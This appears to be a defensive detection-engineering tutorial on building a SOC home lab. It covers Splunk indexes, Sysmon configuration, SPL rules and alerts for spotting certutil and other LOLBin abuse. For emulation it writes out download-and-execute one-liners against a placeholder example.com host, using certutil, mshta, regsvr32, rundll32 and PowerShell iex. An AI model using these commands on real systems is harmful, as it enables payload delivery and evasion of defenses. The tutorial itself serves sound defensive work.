SOC Home Lab: Emulate LOLBins & Write Splunk SPL Detection Rules
Configuring Dedicated Splunk Indexes for Windows Telemetry
By default, Splunk routes incoming events to the main index. For operational efficiency, query performance, and retention control, Windows endpoint logs—System, Security, PowerShell, and Sysmon—should land in a dedicated index. On a Windows host running the Splunk Universal Forwarder, edit C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf:
[WinEventLog://Application]
disabled = 0
index = windows
[WinEventLog://Security]
disabled = 0
index = windows
[WinEventLog://System]
disabled = 0
index = windows
[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = 0
index = windows
[XmlWinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = windows
Restart the Universal Forwarder service (Restart-Service SplunkForwarder) after saving.
Fixing Silent Event Drops
Assigning index = windows in inputs.conf does not create the index on the Splunk Enterprise indexer. If the target index is missing, Splunk silently drops incoming events—no warning, no fallback to main.
To resolve:
1. Log into Splunk Web on the indexer.
2. Navigate to Settings > Indexes > New Index.
3. Name it windows, set Max Size (e.g., 50 GB for a lab), Frozen Time Period (e.g., 30 days), and enable Data Integrity Check if desired.
4. Save, then verify with index=windows earliest=-24h | stats count by sourcetype.
Retention tip: For a home lab, keep hot/warm buckets on SSD and roll cold to slower storage. Set maxTotalDataSizeMB in indexes.conf if you manage indexes via configuration files rather than the UI.
Simulating Threat Activity with LOLBins (Certutil)
Living-off-the-Land Binaries (LOLBins) are signed Microsoft utilities that adversaries repurpose for payload delivery, defense evasion, and persistence. The LOLBAS project documents over 130 such binaries. Certutil.exe, mapped to MITRE ATT&CK T1105 (Ingress Tool Transfer) and T1140 (Deobfuscate/Decode Files), is a staple for file download and decode operations.
Run the following on your target Windows endpoint from a writable directory:
cd C:\Users\Public
certutil.exe -urlcache -split -f "http://example.com" test.txt
Flags explained:
- -urlcache — displays or deletes URL cache entries; with a URL argument, fetches the resource.
- -split — splits the download into chunks, evading simple size-based inspection.
- -f — forces overwrite of existing cache/file.
Both Sysmon Event ID 1 (Process Create) and PowerShell Script Block Logging (Event ID 4104) capture this activity. Ensure Sysmon is installed with a configuration that logs command lines (see Sysmon section below).
Additional LOLBin Variants to Test
Extend coverage by emulating other common download vectors:
| Binary | Command Example | MITRE Technique |
|---|---|---|
mshta.exe |
mshta.exe http://example.com/payload.hta |
T1218.005 |
regsvr32.exe |
regsvr32 /s /n /u /i:http://example.com/payload.sct scrobj.dll |
T1218.010 |
rundll32.exe |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.com/payload.sct") |
T1218.011 |
powershell.exe |
powershell -c "iwr http://example.com/payload.ps1 -OutFile $env:TEMP\p.ps1; iex (gc $env:TEMP\p.ps1)" |
T1059.001 |
Log each execution, then verify ingestion before writing rules.
Sysmon Configuration for Rich Telemetry
Default Sysmon logging misses critical fields. Deploy a community configuration such as SwiftOnSecurity/sysmon-config or olafhartong/sysmon-modular. Key Event IDs to enable:
- Event ID 1 — Process Creation (command line, parent image, hashes)
- Event ID 3 — Network Connection (destination IP, port, protocol)
- Event ID 7 — Image Load (DLLs, signed status)
- Event ID 8 — CreateRemoteThread
- Event ID 10 — Process Access
- Event ID 11 — File Create
- Event ID 13/14 — Registry Value/Key Set
- Event ID 15 — File Create Stream Hash
- Event ID 17/18 — Pipe Created/Connected
- Event ID 22 — DNS Query
- Event ID 23/24/25 — File Delete, Clipboard Change, Process Tampering
Install with: sysmon.exe -accepteula -i sysmonconfig.xml. Validate with Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 5 | Format-List.
Validating Telemetry and Writing Targeted SPL Rules
After executing the certutil test, confirm raw log arrival:
index=windows "urlcache"
Expand an event to inspect fields: ProcessName, CommandLine, ParentImage, User, Computer, EventCode (4688 for Security, 1 for Sysmon).
Refining Detection Logic
Broad searches for certutil.exe generate noise from legitimate certificate operations (AD CS, WSUS, SCCM). Effective detection isolates suspicious flag combinations:
index=windows
( sourcetype=XmlWinEventLog OR sourcetype=WinEventLog:Security )
certutil.exe
("-urlcache" OR "-split" OR "-f" OR "-decode" OR "-verifyctl")
| eval suspicious=case(
like(CommandLine, "% -urlcache % -split % -f %"), "download_split_force",
like(CommandLine, "% -decode %"), "decode_operation",
1=1, "other_flag"
)
| stats count min(_time) as earliest max(_time) as latest by Computer User ProcessName CommandLine ParentImage suspicious
| convert ctime(earliest) ctime(latest)
| sort - latest
Explanation: - Filters to Windows security and Sysmon sourcetypes. - Matches the four flags most associated with payload staging. - Classifies the variant for triage. - Aggregates by host/user/command line to reduce alert volume.
False-Positive Suppression
Legitimate admin tools (e.g., certutil -verifyctl for CTL updates) may trigger. Add a lookup of approved parent processes or command-line hashes:
| lookup certutil_allowlist CommandLineHash OUTPUT approved
| where isnull(approved)
Populate the lookup with hashes from a baseline week of clean activity.
Setting Up Alerts and Testing the Detection Pipeline
Convert the refined query into an automated alert:
- In Search & Reporting, run the final SPL and click Save As > Alert.
- Title:
Suspicious CertUtil Download Flags Detected. - Alert Type: Scheduled, run every 5 minutes, cron
*/5 * * * *. Real-time alerts consume search-head resources; avoid in production. - Time Range: Relative,
-5m@mto@m(aligns with schedule). - Trigger Condition: Per-Result (one alert per matching event).
- Throttle: Suppress for 1 hour per
Computer, CommandLineto prevent storming. - Trigger Actions: Add to Triggered Alerts, optionally Send Email or Webhook to a SOAR/Slack endpoint.
Validating the Alert Pipeline
Return to the target Windows machine and run a modified test:
certutil.exe -urlcache -split -f "http://example.org" alert_test.txt
In Splunk Web, navigate to Activity > Triggered Alerts. The alert should appear within the schedule window. Drill down to confirm the raw event, extracted fields, and suspicious classification.
Building a Detection Dashboard
Create a Splunk dashboard panel for ongoing visibility:
index=windows
( sourcetype=XmlWinEventLog OR sourcetype=WinEventLog:Security )
certutil.exe ("-urlcache" OR "-split" OR "-f" OR "-decode")
| timechart span=1h count by suspicious
Add a second panel showing top offending hosts:
...same base search...
| stats count by Computer User CommandLine
| sort - count
| head 20
SOC Lab Detection Engineering Checklist
Use this checklist when building and testing new detection rules in your home lab:
- [ ] Verify Index Configuration: Confirm the destination index exists on the indexer before updating endpoint
inputs.conf. - [ ] Confirm Raw Ingestion: Run a broad search (
index=<your_index> "<keyword>") to verify telemetry flow. - [ ] Deploy Sysmon Config: Install a hardened Sysmon configuration (SwiftOnSecurity or modular) and validate Event IDs 1, 3, 7, 11, 22.
- [ ] Enable PowerShell Logging: Turn on Module Logging and Script Block Logging via Group Policy (
Administrative Templates > Windows Components > Windows PowerShell). - [ ] Extract Command-Line Context: Identify process names, parent processes, specific CLI flags, and network indicators.
- [ ] Map to MITRE ATT&CK: Tag each rule with technique IDs (e.g., T1105, T1218.005) for coverage tracking.
- [ ] Tune Detection Rules: Add allowlist lookups, parent-process filters, and frequency thresholds to reduce false positives.
- [ ] Configure Alert Actions: Map detection queries to scheduled alerts with throttling; add enrichment (VT, AbuseIPDB) via lookups or external scripts.
- [ ] Validate End-to-End: Re-run modified commands on the target host to confirm alert triggering and dashboard population.
- [ ] Document the Rule: Record logic, data sources, MITRE tags, known false positives, and revision history in a detection catalog (Markdown, Notion, or Git).
Next Steps
- Add the remaining LOLBin variants (mshta, regsvr32, rundll32) to your test corpus and write parallel SPL rules.
- Build a MITRE ATT&CK coverage matrix in a dashboard—count rules per technique.
- Integrate a threat-intel feed (AlienVault OTX, Abuse.ch) to enrich destination IPs in certutil network events.
- Automate rule deployment with Splunk's
savedsearches.confin a version-controlled app (local/), enabling CI/CD for detection engineering.
FAQ
Why does certutil.exe trigger false positives in Windows environments?
Built-in services and systems management software (such as Active Directory Certificate Services, SCCM, and WSUS) frequently execute certutil to verify Certificate Revocation Lists or download trust catalogs. High-fidelity detections focus specifically on payload staging arguments like -urlcache, -split, and -decode rather than simple process execution.
Why are events dropped when specifying index = windows in inputs.conf?
Splunk Enterprise requires an index stanza to be configured on the indexer before it accepts data for that index. If the index does not exist, incoming events sent to that index are dropped silently without routing back to the default main index.
Why use scheduled alerts instead of real-time alerts in Splunk?
Real-time alerts maintain an open search process that consumes dedicated CPU cores continuously on the search head and indexers. Running scheduled alerts every 5 minutes over a matching relative time window drastically reduces server load while remaining responsive enough for SOC operations.
Which Sysmon event IDs provide the best visibility into LOLBin activity?
Sysmon Event ID 1 (Process Create) captures full command-line arguments and parent process images. Event ID 3 (Network Connection) captures external connections initiated by binaries like certutil or mshta, and Event ID 11 (File Create) records payloads written to disk.
Sources
- DEV Community - Building a SOC Home Lab II: Local Threat Emulation & SPL Detection Engineering
- Splunk Documentation - Create and manage indexes
- MITRE ATT&CK - Technique T1105: Ingress Tool Transfer
- LOLBAS Project - Certutil
- SwiftOnSecurity Sysmon Configuration
- Microsoft - Enable PowerShell Script Block Logging